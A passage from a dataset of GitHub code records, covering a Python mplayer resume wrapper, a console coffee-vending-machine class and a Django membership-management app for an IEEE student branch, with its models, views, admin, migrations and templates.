"text": "#!/usr/bin/env python\n\nimport sys\nimport os\nimport subprocess\nimport re\nimport io\nimport binascii\nimport pygtk\npygtk.require('2.0')\nimport gtk\n\n\nclass MpwrapperWindow:\n _resume = True\n \n def getResume(self):\n return self._resume\n\n def resumeHandler(self, widget, data = None):\n self.window.destroy()\n\n def startHandler(self, widget, data = None):\n self._resume = False\n self.window.destroy()\n \n def on_window_key_press_event(self,window,event):\n if event.keyval == 119:\n self.resumeButton.grab_focus()\n elif event.keyval == 115:\n self.startButton.grab_focus()\n\n def destroy(self, widget, data = None):\n gtk.main_quit()\n \n def __init__(self):\n self.window = gtk.Window(gtk.WINDOW_TOPLEVEL)\n self.window.connect(\"destroy\", self.destroy)\n self.window.set_border_width(20)\n self.resumeButton = gtk.Button(\"Resume\")\n self.resumeButton.connect(\"clicked\", self.resumeHandler, None)\n self.startButton = gtk.Button(\"Play from start\")\n self.startButton.connect(\"clicked\", self.startHandler, None)\n self.box = gtk.VBox(False, 20)\n self.box.pack_start(self.resumeButton, False, False, 0)\n self.resumeButton.show()\n self.box.pack_start(self.startButton, False, False, 0)\n self.startButton.show()\n self.window.add(self.box)\n self.box.show()\n self.window.set_decorated(False)\n self.window.set_position(gtk.WIN_POS_CENTER)\n self.window.set_keep_above(True)\n self.window.connect(\"key-press-event\", self.on_window_key_press_event)\n self.window.show()\n \n def main(self):\n gtk.main()\n\n\ndef main(args):\n #sys.stderr = sys.stdout = open(os.path.expanduser(\"~/.mpwrapper.log\"), 'w')\n \n if len(args) == 1:\n print \"Error: no argument(s)\"\n exit(1)\n\n arg = args[1]\n\n mpwPath = os.path.expanduser(\"~/.mpwrapper\")\n if not os.path.isdir(mpwPath):\n os.mkdir(mpwPath)\n\n id = \"%08x\" % (binascii.crc32(arg) & 0xffffffff)\n posFileName = os.path.join(mpwPath, id)\n eq2FileName = os.path.join(mpwPath, \"eq2\")\n \n mpCommand = \"mplayer -v -fs\"\n\n try:\n posFile = open(posFileName, 'r')\n pos = posFile.read()\n if float(pos) > 10:\n mpwrapperWindow = MpwrapperWindow()\n mpwrapperWindow.main()\n if mpwrapperWindow.getResume():\n mpCommand += \" -ss \" + pos\n posFile.close()\n except IOError:\n pass\n \n mpCommand += \" -vf eq2\" \n try:\n eq2File = open(eq2FileName, 'r')\n eq2 = eq2File.read()\n eq2File.close()\n mpCommand += \"=\" + eq2\n except IOError:\n pass\n \n mpCommand += extraRules(arg)\n \n ps = subprocess.Popen(mpCommand.split(' ') + [arg],\n stdout=subprocess.PIPE, stderr=subprocess.STDOUT,\n universal_newlines = True)\n\n posRe = re.compile('^A:\\s*([^\\s]+)\\s*')\n eq2Re = re.compile('^vf_eq2')\n eq2 = False\n for line in ps.stdout:\n line = line.rstrip('\\n')\n match = posRe.match(line)\n if match:\n pos = match.group(1)\n elif eq2Re.match(line):\n eq2 = line\n\n posFile = open(posFileName, 'w')\n posFile.write(pos)\n posFile.close()\n \n if eq2:\n eq2Val = ':'.join([ [i[2:] for i in eq2.strip().split(' ')[1:]][j]\n for j in [2, 0, 1, 3] ])\n eq2File = open(eq2FileName, 'w')\n eq2File.write(eq2Val)\n posFile.close()\n\n\ndef extraRules(arg):\n extraOpts = \"\"\n \n #extraOpts += \" -aspect 4:3\"\n \n return extraOpts\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n"
}
] | 1 |
Gaurang0053/vendor-machine
|
https://github.com/Gaurang0053/vendor-machine
|
78f69eca28c96a416682a603fdddf08d4fd20f5d
|
b64044800c7447990a0cf077df3048e6c37e6501
|
c3bf8bd67192a2b688e3164cd7e3e45d56cf6e93
|
refs/heads/main
| 2023-03-18T16:33:11.420800 | 2021-03-16T19:37:56 | 2021-03-16T19:37:56 | 348,445,228 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5708775520324707,
"alphanum_fraction": 0.5836547613143921,
"avg_line_length": 38.27184295654297,
"blob_id": "2f7520206e246fa5bba411c781dae838fb2154ab",
"content_id": "99539b69124cbf7d635950870c1edc97f62a502e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4148,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 103,
"path": "/vendor machine.py",
"repo_name": "Gaurang0053/vendor-machine",
"src_encoding": "UTF-8",
"text": "class CoffeeMachine:\r\n\r\n running = False\r\n\r\n def __init__(self,customer, water, milk, coffee_beans, cups):\r\n # quantities of items the coffee machine already had\r\n self.customer=customer\r\n self.water = water\r\n self.milk = milk\r\n self.coffee_beans = coffee_beans\r\n self.cups = cups\r\n\r\n\r\n # if the machine isnt running then start running\r\n if not CoffeeMachine.running:\r\n self.start()\r\n\r\n\r\n def start(self):\r\n self.running = True # it is running as to not trigger the start() in initialiser method\r\n self.action = input(\"Write action (buy, fill, remaining, exit):\\n\")\r\n print()\r\n\r\n # possible choices to perform in the coffee machine\r\n action_choices = {\"buy\": self.buy, \"fill\": self.fill, \"exit\": exit, \"remaining\": self.status}\r\n\r\n if self.action in action_choices:\r\n action_choices[self.action]()\r\n else:\r\n exit()\r\n\r\n\r\n def return_to_menu(self): # returns to the menu after an action\r\n print()\r\n self.start()\r\n\r\n def available_check(self): # checks if it can afford making that type of coffee at the moment\r\n\r\n self.not_available = \"\" # by checking whether the supplies goes below 0 after it is deducted\r\n if self.water - self.reduced[0] < 0:\r\n self.not_available = \"water\"\r\n elif self.milk - self.reduced[1] < 0:\r\n self.not_available = \"milk\"\r\n elif self.coffee_beans - self.reduced[2] < 0:\r\n self.not_available = \"coffee beans\"\r\n elif self.cups - self.reduced[3] < 0:\r\n self.not_available = \"disposable cups\"\r\n\r\n if self.not_available != \"\": # if something was detected to be below zero after deduction\r\n print(f\"Sorry, not enough {self.not_available}!\")\r\n return False\r\n else: # if everything is enough to make the coffee\r\n print(\"I have enough resources, making you a coffee!\")\r\n return True\r\n\r\n def deduct_supplies(self): # performs operation from the reduced list, based on the coffee chosen\r\n self.water -= self.reduced[0]\r\n self.milk -= self.reduced[1]\r\n self.coffee_beans -= self.reduced[2]\r\n self.cups -= self.reduced[3]\r\n\r\n def buy(self):\r\n self.customer += str(input(\"enter the customer name:\\n\"))\r\n self.choice = input(\"What do you want to buy?\\n 1 - espresso\\n 2 - latte\\n 3 - cappuccino\\n back - to main menu:\\n\")\r\n if self.choice == '1':\r\n self.reduced = [250, 0, 16, 1] # water, milk, coffee beans, cups\r\n if self.available_check(): # checks if supplies are available\r\n self.deduct_supplies() # if it is, then it deducts\r\n\r\n elif self.choice == '2':\r\n self.reduced = [350, 75, 20, 1]\r\n if self.available_check():\r\n self.deduct_supplies()\r\n\r\n elif self.choice == \"3\":\r\n self.reduced = [200, 100, 12, 1]\r\n if self.available_check():\r\n self.deduct_supplies()\r\n\r\n elif self.choice == \"back\":\r\n self.return_to_menu()\r\n\r\n self.return_to_menu()\r\n\r\n def fill(self): # for adding supplies to the machine\r\n self.customer += str(input(\"enter the customer name:\\n\"))\r\n self.water += int(input(\"Write how much water do you want to add:\\n\"))\r\n self.milk += int(input(\"Write how much milk do you want to add:\\n\"))\r\n self.coffee_beans += int(input(\"Write how many coffee beans do you want to add:\\n\"))\r\n self.cups += int(input(\"Write how many disposable cups of coffee do you want to add:\\n\"))\r\n self.return_to_menu()\r\n\r\n\r\n def status(self): # to display the quantities of supplies in the machine at the moment\r\n print(f\"The coffee machine has:\")\r\n print(f\"{self.water}ml of water\")\r\n print(f\"{self.milk}ml of milk\")\r\n print(f\"{self.coffee_beans} of coffee beans\")\r\n print(f\"{self.cups} no of disposable cups\")\r\n self.return_to_menu()\r\n\r\n\r\nCoffeeMachine(\"john\",400, 540, 120, 9) # specify the quantities of supplies at the beginning\r\n"
}
] | 1 |
davalerova/ieee-etitc
|
https://github.com/davalerova/ieee-etitc
|
7b495dc7c47467ca4fa932c42cfd8041ea375a11
|
19f932f06afa28fc2c3b40d7c8410678e840575c
|
cd9c378e0f19e5cbb7b64c183353c638858ab7bb
|
refs/heads/master
| 2022-09-01T03:11:33.023657 | 2020-05-31T00:49:51 | 2020-05-31T00:49:51 | 266,639,097 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6545936465263367,
"alphanum_fraction": 0.6545936465263367,
"avg_line_length": 29.62162208557129,
"blob_id": "ab2742f45d8293939f8da26d82b22b583822947a",
"content_id": "79117111e4e5cbabeb8dcdde1d80da9198a51c9f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1132,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 37,
"path": "/actividad_interna/views.py",
"repo_name": "davalerova/ieee-etitc",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render, redirect\nfrom django.views import generic\nfrom django.http import HttpResponse\nfrom django.urls import reverse_lazy\nfrom django.shortcuts import render, redirect\n\n\nfrom .models import Actividad_interna\n#from .forms import *\n\n\n########################################################################################################################\n\nclass ActividadInternaView(generic.ListView):\n model = Actividad_interna\n template_name = 'actividad_interna/actividad_listar.html'\n context_object_name = 'obj'\n\n\ndef actividad_inactivar(request, id):\n actividad_interna = Actividad_interna.objects.filter(pk=id).first()\n contexto={}\n template_name=\"actividad_interna/actividad_del.html\"\n\n\n if not actividad_interna:\n return redirect(\"actividad_interna:actividad_listar\")\n \n if request.method=='GET':\n contexto={'obj':actividad_interna}\n \n if request.method=='POST':\n actividad_interna.activo=False\n actividad_interna.save()\n return redirect(\"actividad_interna:actividad_listar\")\n\n return render(request,template_name,contexto)"
},
{
"alpha_fraction": 0.7055761814117432,
"alphanum_fraction": 0.7055761814117432,
"avg_line_length": 52.84000015258789,
"blob_id": "3b703ccc4581069c1eab955851d440f4e2ca8971",
"content_id": "7c5c2774f39c99ef091e2ab86727673a73594ba0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1345,
"license_type": "no_license",
"max_line_length": 226,
"num_lines": 25,
"path": "/miembro/admin.py",
"repo_name": "davalerova/ieee-etitc",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\n\nfrom .models import Miembro, Genero, Eps, Ciudad, Barrio, Tipo_sangre, Sede, Rol_miembro, User\n\n# Register your models here.\nadmin.site.register(Genero)\nadmin.site.register(Eps)\nadmin.site.register(Ciudad)\nadmin.site.register(Tipo_sangre)\nadmin.site.register(Sede)\nadmin.site.register(Rol_miembro)\n\n\[email protected](Miembro)\nclass MiembroAdmin(admin.ModelAdmin):\n list_display = ('nombres', 'apellidos', 'correo_institucional', 'correo_personal', 'fecha_nacimiento', 'edad', 'mayor_de_edad','celular', 'genero', 'eps', 'barrio', 'ciudad', 'tipo_sangre', 'sede', 'rol_miembro', 'activo')\n list_display_links = ('nombres', 'apellidos', 'correo_institucional', 'correo_personal', 'fecha_nacimiento', 'edad', 'mayor_de_edad','celular', 'genero', 'eps', 'barrio', 'ciudad','tipo_sangre', 'sede', 'rol_miembro')\n list_filter = ('barrio__ciudad', 'genero', 'sede', 'rol_miembro', 'eps', 'tipo_sangre', 'activo')\n search_fields = ('nombres', 'apellidos', 'barrio__descripcion', 'barrio__ciudad__descripcion', 'celular', 'rol_miembro__descripcion', 'genero__descripcion', 'barrio__descripcion', 'tipo_sangre__descripcion')\n\[email protected](Barrio)\nclass BarrioAdmin(admin.ModelAdmin):\n list_display = ('descripcion','ciudad')\n list_display_links = ('descripcion','ciudad')\n list_filter = ('ciudad',)"
},
{
"alpha_fraction": 0.8062283992767334,
"alphanum_fraction": 0.8131487965583801,
"avg_line_length": 18.266666412353516,
"blob_id": "1d8de5ac9e151573978e2291c00e8044ef1913e0",
"content_id": "7d90dcdff715d8d473b504319345a4ae67e7b848",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 289,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 15,
"path": "/README.md",
"repo_name": "davalerova/ieee-etitc",
"src_encoding": "UTF-8",
"text": "ieee_etitc\n\nCree un entorno virtual con Python3\n\nDentro del entorno virtual ejecute: pip3 install Django\n\nLuego vaya a la carpeta que contiene el manage.py y ejecute: \n\npython manage.py makemigrations\n\npython manage.py migrate\n\npython manage.py createsuperuser\n\npython manage.py runserver\n"
},
{
"alpha_fraction": 0.48554572463035583,
"alphanum_fraction": 0.4877089560031891,
"avg_line_length": 29.455089569091797,
"blob_id": "0f2a2a4582a69ee9f171897975aa8606533f11dd",
"content_id": "35da46f402f3f0a4524c3f07760a8d621968f8d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 5087,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 167,
"path": "/miembro/templates/miembro/miembro_listar.html",
"repo_name": "davalerova/ieee-etitc",
"src_encoding": "UTF-8",
"text": "{% extends 'base/base.html' %}\n{% block miembros %}<strong>Miembros</strong>{% endblock %}\n{% block page_content%}\n\n <div class=\"wrapper \">\n \t<nav id=\"sidebar\">\n \t\t<div class=\"sidebar-header\">\n \t\t\t<h3>Miembros</h3>\n \t\t</div>\n \t\t\n \t\t\n \t\t<ul class=\"list-unstyled components\">\n \t\t\n {% if perms.miembro.change_miembro%}\n <li>\n\t\t\t\t\t<a href=\"{{BASE_DIR}}/admin/miembro/miembro/add/\">Crear</a>\n\t\t\t\t</li>\n \t\t {% endif %}\n {% if perms.miembro.change_miembro%}\n\t\t\t\t<li>\n\t\t\t\t\t<a href=\"{{BASE_DIR}}/admin/miembro/miembro/\">Listar</a>\n\t\t\t\t</li>\n\t\t\t{%else %}\n\n\t\t\t\t<li>\n\t\t\t\t\t<a href=\"#\">Listar</a>\n\t\t\t\t</li>\n\t\t\t{%endif%}\n\t\t\t\t<li>\n\t\t\t\t\t<a href=\"#pageSubmenu\" data-toggle=\"collapse\" aria-expanded=\"false\" class=\"dropdown-toggle\">Filtar</a>\n\t\t\t\t\t<ul class=\"collapse list-unstyled\" id=\"pageSubmenu\">\n\t\t\t\t\t\t<li>\n\t\t\t\t\t\t\t<a href=\"#\">Nombre</a>\n\t\t\t\t\t\t</li>\n\t\t\t\t\t\t<li>\n\t\t\t\t\t\t\t<a href=\"#\">Carrera</a>\n\t\t\t\t\t\t</li>\n\t\t\t\t\t\t<li>\n\t\t\t\t\t\t\t<a href=\"#\">Capitulo</a>\n\t\t\t\t\t\t</li>\n\t\t\t\t\t</ul> \n\t\t\t\t</li>\n\t\t\t \n\t\t\t\t<li>\n \t\t\t\t<a href=\"#\">Puntos</a>\n\t\t\t\t</li>\n \t\t\t</ul>\n \t\t</nav>\n \t\n \t\t<div class=\"content\">\n \t\t<nav class=\"navbar navbar-expand-lg navbar-light bg-light\">\n\t</nav>\n</div>\n\n\t<div class='container-fluid'>\n\t\t<div class=''>\n\t\t\t<div class=\"card shadow\">\n <!-- Card Header - Dropdown -->\n <div class=\"card-header d-flex flex-row align-items-center justify-content-between\">\n <h6 class=\"m-0 font-weight-bold text-primary\">Listado de miembros</h6>\n <div class=\"dropdown no-arrow\">\n <a class=\"dropdown-toggle\" href=\"#\" role=\"button\" id=\"dropdownMenuLink\" data-toggle=\"dropdown\"\n aria-haspopup=\"true\" aria-expanded=\"false\">\n <i class=\"fas fa-ellipsis-v fa-sm fa-fw text-gray-400\"></i>\n </a>\n \n </div>\n </div>\n <!-- Card Body -->\n <div class=\"card-body\">\n {% if not obj %}\n <div class=\"alert alert-info\">No hay usuarios registrados</div>\n {% else %}\n <table class=\"table table-striped table-hover\">\n <thead>\n <!--<th>RFID</th>-->\n <th>Nombres</th>\n <th>Apellidos</th>\n <th>Correo institucional</th>\n <th>Fecha de ingreso</th>\n {% if perms.miembro.change_miembro%}\n <th class=\"all\">Acciones</th>\n {% endif %}\n </thead>\n <tbody>\n {% for item in obj %}\n {%if item.activo%}\n <tr>\n <td>{{ item.nombres }}</td>\n <td>{{ item.apellidos }}</td>\n <td>{{ item.correo_institucional}}</td>\n <td>{{ item.fc|date:\"d/m/Y H:i:s\"}}</td>\n {#%if user.is_staff%#}\n <td>\n {% if perms.miembro.change_miembro%}\n <a href=\"{{BASE_DIR}}/admin/miembro/miembro/{{item.id}}/change/\"\n class=\"btn btn-warning btn-circle\"\n role=\"button\"><i class=\"far fa-edit\"></i></a>\n {%endif%}\n {% if perms.miembro.change_miembro%}\n <a href=\"{% url 'miembro:miembro_inactivar' item.id %}\"\n class=\"btn btn-danger btn-circle\" role=\"button\"><i class=\"far fa-thumbs-down\"></i></a>\n {%endif%}\n </td>\n {#% endif %#}\n </tr>\n {%endif%}\n {% endfor %}\n </tbody>\n </table>\n {% endif %}\n </div>\n{% endblock %}\n\n\n{% block js_page %}\n<script>\n // Call the dataTables jQuery plugin\n $(document).ready(function() {\n $('.table').DataTable({\n \"language\": {\n \"sProcessing\": \"Procesando...\",\n \"sLengthMenu\": \"Registros por página: _MENU_\",\n \"sZeroRecords\": \"No se encontraron resultados\",\n \"sEmptyTable\": \"Ningún dato disponible en esta tabla\",\n \"sInfo\": \"Mostrando registros del _START_ al _END_ de un total de _TOTAL_ registros\",\n \"sInfoEmpty\": \"Mostrando registros del 0 al 0 de un total de 0 registros\",\n \"sInfoFiltered\": \"(filtrado de un total de _MAX_ registros)\",\n \"sInfoPostFix\": \"\",\n \"sSearch\": \"Buscar:\",\n \"sUrl\": \"\",\n \"sInfoThousands\": \",\",\n \"sLoadingRecords\": \"Cargando...\",\n \"oPaginate\": {\n \"sFirst\": \"<span class='fa fa-angle-double-left'></span>\",\n \"sLast\": \"<span class='fa fa-angle-double-right'></span>\",\n \"sNext\": \"<span class='fa fa-angle-right'></span>\",\n \"sPrevious\": \"<span class='fa fa-angle-left'></span>\"\n },\n \"oAria\": {\n \"sSortAscending\": \": Activar para ordenar la columna de manera ascendente\",\n \"sSortDescending\": \": Activar para ordenar la columna de manera descendente\"\n }\n }\n });\n });\n\n\n</script>\n\t\t</div>\n\t</div>\n \t\n \t\n \t\n </div>\n \n\n <script>\n\t $(document).ready(function(){\n\t\t\t$('#sidebarCollapse').on('click',function(){\n\t\t\t\t$('#sidebar').toggleClass('active');\n\t\t\t});\n\t\t}); \n\t</script>\n\n\n{% endblock %}"
},
{
"alpha_fraction": 0.7782101035118103,
"alphanum_fraction": 0.7782101035118103,
"avg_line_length": 24.799999237060547,
"blob_id": "21f2fa4029bdaaf94c587b6adf0364b514e2c85c",
"content_id": "cef0f3b5a8db185be33392aaae0dde1004e3be07",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 257,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 10,
"path": "/bases/views.py",
"repo_name": "davalerova/ieee-etitc",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\n\n# Create your views here.\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.views import generic\n\n\nclass Home( generic.TemplateView ):\n template_name = 'bases/home.html'\n login_url='bases:login'"
},
{
"alpha_fraction": 0.6033959984779358,
"alphanum_fraction": 0.6185566782951355,
"avg_line_length": 36.477272033691406,
"blob_id": "006c3061aab9fa20ae56195bec51554b6756bfcf",
"content_id": "086841010bc39061d1e1c63e9d963a36a8608871",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1653,
"license_type": "no_license",
"max_line_length": 158,
"num_lines": 44,
"path": "/miembro/migrations/0002_auto_20200525_1611.py",
"repo_name": "davalerova/ieee-etitc",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.6 on 2020-05-25 21:11\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('miembro', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='rol_miembro',\n options={'verbose_name': 'Rol miembro', 'verbose_name_plural': 'Roles miembro'},\n ),\n migrations.AlterModelOptions(\n name='tipo_sangre',\n options={'verbose_name': 'Tipo de sangre', 'verbose_name_plural': 'Tipos de sangre'},\n ),\n migrations.AlterField(\n model_name='miembro',\n name='correo_institucional',\n field=models.EmailField(max_length=70, unique=True, verbose_name='Correo electrónico institucional'),\n ),\n migrations.AlterField(\n model_name='miembro',\n name='correo_personal',\n field=models.EmailField(max_length=70, unique=True, verbose_name='Correo electrónico personal'),\n ),\n migrations.AlterField(\n model_name='miembro',\n name='usuario',\n field=models.OneToOneField(on_delete=django.db.models.deletion.PROTECT, to=settings.AUTH_USER_MODEL),\n ),\n migrations.AlterField(\n model_name='rol_miembro',\n name='descripcion',\n field=models.CharField(help_text='Descripción del rol del miembro dentro de la rama', max_length=45, unique=True, verbose_name='Descripción rol'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5492610931396484,
"alphanum_fraction": 0.6034482717514038,
"avg_line_length": 21.55555534362793,
"blob_id": "8d01e935289832c7a93bbe6cfc7984b8754ab95b",
"content_id": "71aa25a5a201f03a073734413790bd1e044b8606",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 406,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 18,
"path": "/actividad_interna/migrations/0002_auto_20200526_0138.py",
"repo_name": "davalerova/ieee-etitc",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.6 on 2020-05-26 06:38\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('actividad_interna', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='actividad_interna',\n name='lugar_actividad',\n field=models.CharField(max_length=255),\n ),\n ]\n"
},
{
"alpha_fraction": 0.7870370149612427,
"alphanum_fraction": 0.7870370149612427,
"avg_line_length": 20.600000381469727,
"blob_id": "34691f7286baa9a23e649fd614def2ea03d72d06",
"content_id": "6f03dabe115f80f56988a7f97bdc73467c09efac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 108,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 5,
"path": "/actividad_interna/apps.py",
"repo_name": "davalerova/ieee-etitc",
"src_encoding": "UTF-8",
"text": "from django.apps import AppConfig\n\n\nclass ActividadInternaConfig(AppConfig):\n name = 'actividad_interna'\n"
},
{
"alpha_fraction": 0.7182705998420715,
"alphanum_fraction": 0.7182705998420715,
"avg_line_length": 36.78947448730469,
"blob_id": "d16859ef9a8fcce075baa785415f6ccf49c6a82e",
"content_id": "f27acaa9dba9a0a4b67c8ae0bfcb178309ec23ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 717,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 19,
"path": "/actividad_interna/admin.py",
"repo_name": "davalerova/ieee-etitc",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\n\nfrom .models import Tipo_actividad, Actividad_interna\n\n# Register your models here.\n\n\[email protected](Tipo_actividad)\nclass Tipo_actividadAdmin(admin.ModelAdmin):\n list_display = ('descripcion', 'activo')\n list_display_links = ('descripcion', 'activo', )\n list_filter = ('descripcion', 'activo', )\n\[email protected](Actividad_interna)\nclass ActividadInternaAdmin(admin.ModelAdmin):\n list_display = ('nombre','descripcion', 'solo_miembros', 'activo')\n list_display_links = ('nombre','descripcion')\n list_filter = ('tipo_actividad__descripcion', 'solo_miembros', 'activo')\n search_fields = ('nombre', 'descripcion', 'lugar_actividad', 'tipo_actividad__descripcion')"
},
{
"alpha_fraction": 0.5539854764938354,
"alphanum_fraction": 0.5576896667480469,
"avg_line_length": 25.699634552001953,
"blob_id": "22c5bb0d9a75bfbdc9e9ae98a29a692da2a380ad",
"content_id": "66498c0cd4ed3ca6f5cfe18888945c4708e841d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7313,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 273,
"path": "/miembro/models.py",
"repo_name": "davalerova/ieee-etitc",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\nfrom bases.models import ClaseModelo\nfrom django.contrib.auth.models import User\n# Create your models here.\n\nfrom datetime import date\n\n#################################################################################\nclass Genero( ClaseModelo ):\n\n descripcion = models.CharField(\n max_length=45,\n help_text='Descripción del género',\n unique=True,\n verbose_name='Descripción género'\n )\n\n def __str__(self):\n return '{}'.format( self.descripcion )\n\n def save(self):\n self.descripcion = self.descripcion.upper()\n super( Genero, self ).save()\n\n class Meta:\n verbose_name = 'Género'\n verbose_name_plural = 'Géneros'\n\n#################################################################################\nclass Eps( ClaseModelo ):\n\n descripcion = models.CharField(\n max_length=45,\n help_text='Descripción de la EPS',\n unique=True,\n verbose_name='Descripción EPS'\n )\n\n def __str__(self):\n return '{}'.format( self.descripcion )\n\n def save(self):\n self.descripcion = self.descripcion.upper()\n super( Eps, self ).save()\n\n class Meta:\n verbose_name = 'EPS'\n verbose_name_plural = \"EPS's\"\n\n#################################################################################\nclass Ciudad( ClaseModelo ):\n\n descripcion = models.CharField(\n max_length=45,\n help_text='Descripción de la ciudad',\n unique=True,\n verbose_name='Descripción ciudad'\n )\n\n def __str__(self):\n return '{}'.format( self.descripcion )\n\n def save(self):\n self.descripcion = self.descripcion.upper()\n super( Ciudad, self ).save()\n\n class Meta:\n verbose_name = 'Ciudad'\n verbose_name_plural = \"Ciudades\"\n\n#################################################################################\nclass Barrio( ClaseModelo ):\n\n descripcion = models.CharField(\n max_length=45,\n help_text='Descripción del barrio',\n unique=True,\n verbose_name='Descripción barrio'\n )\n\n ciudad = models.ForeignKey(Ciudad, on_delete=models.PROTECT)\n\n nota = models.TextField(blank=True)\n\n def get_ciudad(self):\n return self.ciudad\n\n def __str__(self):\n return '{}'.format( self.descripcion )\n\n def save(self):\n self.descripcion = self.descripcion.upper()\n super( Barrio, self ).save()\n\n class Meta:\n verbose_name = 'Barrio'\n verbose_name_plural = \"Barrios\"\n\n#################################################################################\nclass Tipo_sangre( ClaseModelo ):\n\n descripcion = models.CharField(\n max_length=45,\n help_text='Descripción del tipo de sangre',\n unique=True,\n verbose_name='Descripción tipo de sangre'\n )\n\n def __str__(self):\n return '{}'.format( self.descripcion )\n\n def save(self):\n self.descripcion = self.descripcion.upper()\n super( Tipo_sangre, self ).save()\n\n class Meta:\n verbose_name = 'Tipo de sangre'\n verbose_name_plural = \"Tipos de sangre\"\n\n#################################################################################\nclass Sede( ClaseModelo ):\n\n descripcion = models.CharField(\n max_length=255,\n help_text='Descripción de la sede dende estudia',\n unique=True,\n verbose_name='Descripción sede'\n )\n\n def __str__(self):\n return '{}'.format( self.descripcion )\n\n def save(self):\n self.descripcion = self.descripcion.upper()\n super( Sede, self ).save()\n\n class Meta:\n verbose_name = 'Sede'\n verbose_name_plural = 'Sedes'\n\n#################################################################################\nclass Rol_miembro( ClaseModelo ):\n\n descripcion = models.CharField(\n max_length=45,\n help_text='Descripción del rol del miembro dentro de la rama',\n unique=True,\n verbose_name='Descripción rol'\n )\n\n def __str__(self):\n return '{}'.format( self.descripcion )\n\n def save(self):\n self.descripcion = self.descripcion.upper()\n super( Rol_miembro, self ).save()\n\n class Meta:\n verbose_name = 'Rol miembro'\n verbose_name_plural = 'Roles miembro'\n\n#################################################################################\n\nclass Miembro(ClaseModelo):\n\n nombres = models.CharField(\n max_length=45,\n # help_text='Nombres del miembro',\n verbose_name='Nombres'\n )\n\n apellidos = models.CharField(\n max_length=45,\n # help_text='Apellidos del miembro',\n verbose_name='Apellidos'\n )\n\n correo_institucional = models.EmailField(\n max_length=70,\n # help_text='Correo electrónico del miembro',\n verbose_name='Correo electrónico institucional',\n unique=True\n )\n\n correo_personal = models.EmailField(\n max_length=70,\n # help_text='Correo electrónico del miembro',\n verbose_name='Correo electrónico personal',\n unique=True\n )\n\n\n fecha_nacimiento = models.DateField(null=True)\n \n celular = models.CharField(max_length=15, null=True)\n \n genero = models.ForeignKey(Genero,\n help_text='Gérero del miembro',\n verbose_name='Género',\n on_delete=models.PROTECT,\n null=True\n )\n \n eps = models.ForeignKey(Eps,\n help_text='EPS del miembro',\n verbose_name='EPS',\n on_delete=models.PROTECT,\n null=True\n )\n\n barrio = models.ForeignKey(Barrio,\n help_text='Barrio donde vive el miembro',\n verbose_name='Barrio',\n on_delete=models.PROTECT,\n null=True\n )\n\n tipo_sangre = models.ForeignKey(Tipo_sangre,\n help_text='Tipo de sangre del miembro',\n verbose_name='RH',\n on_delete=models.PROTECT,\n null=True\n )\n\n sede = models.ForeignKey(Sede,\n help_text='Sede donde estudia el miembro',\n verbose_name='Sede',\n on_delete=models.PROTECT,\n null=True\n )\n\n rol_miembro = models.ForeignKey(Rol_miembro,\n help_text='Rol del miembro dentro de la rama',\n verbose_name='Rol miembro',\n on_delete=models.PROTECT,\n null=True\n )\n\n usuario = models.OneToOneField(User,\n on_delete=models.PROTECT\n )\n\n def edad(self):\n hoy = date.today()\n fechanacimiento=self.fecha_nacimiento\n edad = hoy.year - fechanacimiento.year - ((hoy.month, hoy.day) < (fechanacimiento.month, fechanacimiento.day))\n return edad\n\n def mayor_de_edad(self):\n hoy = date.today()\n fechanacimiento=self.fecha_nacimiento\n edad = hoy.year - fechanacimiento.year - ((hoy.month, hoy.day) < (fechanacimiento.month, fechanacimiento.day))\n return edad>17\n \n mayor_de_edad.boolean = True\n\n def ciudad(self):\n return self.barrio.ciudad\n\n def save(self):\n self.nombres = self.nombres.upper()\n self.apellidos = self.apellidos.upper()\n self.correo_institucional = self.correo_institucional.lower()\n self.correo_personal = self.correo_personal.lower()\n super( Miembro, self ).save()\n \n def __str__(self):\n return '{}'.format( self.nombres + \" \" + self.apellidos )\n\n class Meta:\n verbose_name = 'Miembro'\n verbose_name_plural = 'Miembros'\n"
},
{
